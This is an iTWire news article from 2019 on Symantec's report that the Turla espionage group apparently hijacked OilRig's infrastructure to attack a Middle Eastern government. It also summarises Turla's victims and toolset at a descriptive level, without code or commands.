Security Market Segment LS
Friday, 21 June 2019 09:38

A tale of two threat actors: Symantec claims one used the other's infrastructure in attack Featured

By
A tale of two threat actors: Symantec claims one used the other's infrastructure in attack Pixabay

A well-known attack group that is known as Turla, Snake or Waterbug appears to have hijacked and used the infrastructure of another similar group, known as OilRig, APT34 or Crambus, the American security firm Symantec claims.

Turla then used this infrastructure in an attack on a government in the Middle East which OilRig had already compromised, the company claimed in a detailed blog post.

[Given the numerous names bestowed on these attack groups, iTWire will use only Turla and OilRig in this article to avoid confusion.]

But this phenomenon was hinted at in research presented by Kaspersky (formerly Kaspersky Lab) researcher Kurt Baumgartner at his employer's annual security analyst summit in Cancun last year. A Russian-speaking online threat actor, Sofacy, sometimes overlapped with other threat actors like Turla and the Chinese-speaking Danti, when targeting victims, his research claimed.

Baumgartner said Sofacy backdoors were also found on a server which had been previously compromised by the English-speaking threat actor behind the Lamberts, a term used by Kaspersky to indicate CIA-inspired attacks.

Of interest, given the recent brouhaha over stolen NSA exploits, was Symantec's claim that in the course of its attacks, Turla used a custom hacking tool that combined four tools leaked by the Shadow Brokers — EternalBlue, EternalRomance, DoublePulsar and SMBTouch — into a single executable.

Actors from Turla have been observed to be Russian speakers, while OilRig has been linked to Iran by the security firm FireEye which, admittedly, is quick to attribute attacks which other companies are reluctant to do.

The Symantec post comes at a time of rising US pressure on Iran, following the downing of an American spy drone over Iranian territory, as per claims from Teheran. The Americans claim the incident took place over international waters.

Russia has been under US pressure for a long time, ever since claims were made that it played in a role in the US presidential election of 2016. An investigation of more than two years by former FBI chief Robert Mueller failed to come up with any definitive evidence to support this claim.

Symantec's DeepSight Adversary Intelligence Team said recent activity by Turla could be divided into three campaigns, based on the toolsets used. One used a new backdoor called Neptun that acts as a passive listening tool and infects Microsoft Exchange servers. It was an attack during this campaign that used infrastructure belonging to OilRig.

A second campaign used the publicly available backdoor Meterpreter, along with two custom loaders - a custom backdoor photobased.dll and a customer RPC (Remote Procedure Call) backdoor. A third campaign used a different RPC backdoor built of code derived from PowerShellRunner, a tool that is used to execute PowerShell scripts without using the official PowerShell binary.

Victims of the three Turla campaigns were listed as:

  • The foreign affairs ministry of a Latin American country;
  • The foreign affairs ministry of a Middle Eastern country;
  • The foreign affairs ministry of an European country;
  • The interior ministry of a South Asian country;
  • Two unidentified government organisations in a Middle Eastern country;
  • One unidentified government organisation in a Southeast Asian country;
  • A government office of a South Asian country based in another country;
  • An information and communications technology organisation in a Middle Eastern country;
  • Two information and communications technology organisations in two European countries;
  • An information and communications technology organisation in a South Asian country;
  • A multinational organisation in a Middle Eastern country; and
  • An educational institution in a South Asian country.

Regarding the hijacking of OilRig infrastructure by Turla, Symantec said it was possible that the two groups were, instead, collaborating in attacking the same victim, a target in the Middle East. But it said it had not found further evidence in support of this theory.

"In all likelihood, Turla’s use of OilRig infrastructure appears to have been a hostile takeover," the Symantec team speculated. "Curiously though, Turla also compromised other computers on the victim’s network using its own infrastructure."

Turla's recent campaigns have been marked by the deployment of new tools, Symantec said, listing the following:

  • A new custom dropper typically used to install Neptun as a service.
  • A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
  • A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
  • Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Turla command and control (C&C) servers.
  • PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Turla C&Cs.
  • Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Turla tools or infrastructure.

Symantec said there could be a number of reasons for the attackers behind Turla choosing to use infrastructure from OilRig.

One was as a false flag operation, to deceive anyone observing the campaign as to the identity of the actual attacker. A second possibility was that Turla used OilRig's infrastructure as the latter had already gained entry to the target.

"This is the first time Symantec has observed one targeted attack group seemingly hijack and use the infrastructure of another group. However, it is still difficult to ascertain the motive behind the attack. Whether Turla simply seized the opportunity to create confusion about the attack or whether there was more strategic thinking involved remains unknown," the researchers wrote.

"Turla's ever-changing toolset demonstrates a high degree of adaptability by a group determined to avoid detection by staying one step ahead of its targets. Frequent retooling and a penchant for flirting with false flag tactics have made this group one of the most challenging adversaries on the targeted attack landscape."

LEARN HOW TO REDUCE YOUR RISK OF A CYBER ATTACK

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has high potential to be exposed to risk.

It only takes one awry email to expose an accounts payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 steps to improve your Business Cyber Security’ you will learn some simple steps you should be taking to prevent devastating malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you will learn:

· How does business security get breached?
· What can it cost to get it wrong?
· 6 actionable tips

DOWNLOAD NOW!

ADVERTISE ON ITWIRE NEWS SITE & NEWSLETTER

iTWire can help you promote your company, services, and products.

Get more LEADS & MORE SALES

Advertise on the iTWire News Site / Website

Advertise in the iTWire UPDATE / Newsletter

Promote your message via iTWire Sponsored Content/News

Guest Opinion for Home Page exposure

Contact Andrew on 0412 390 000 or email [email protected]

OR CLICK HERE!

Sam Varghese

website statistics

Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.

VENDOR NEWS & EVENTS

REVIEWS

Recent Comments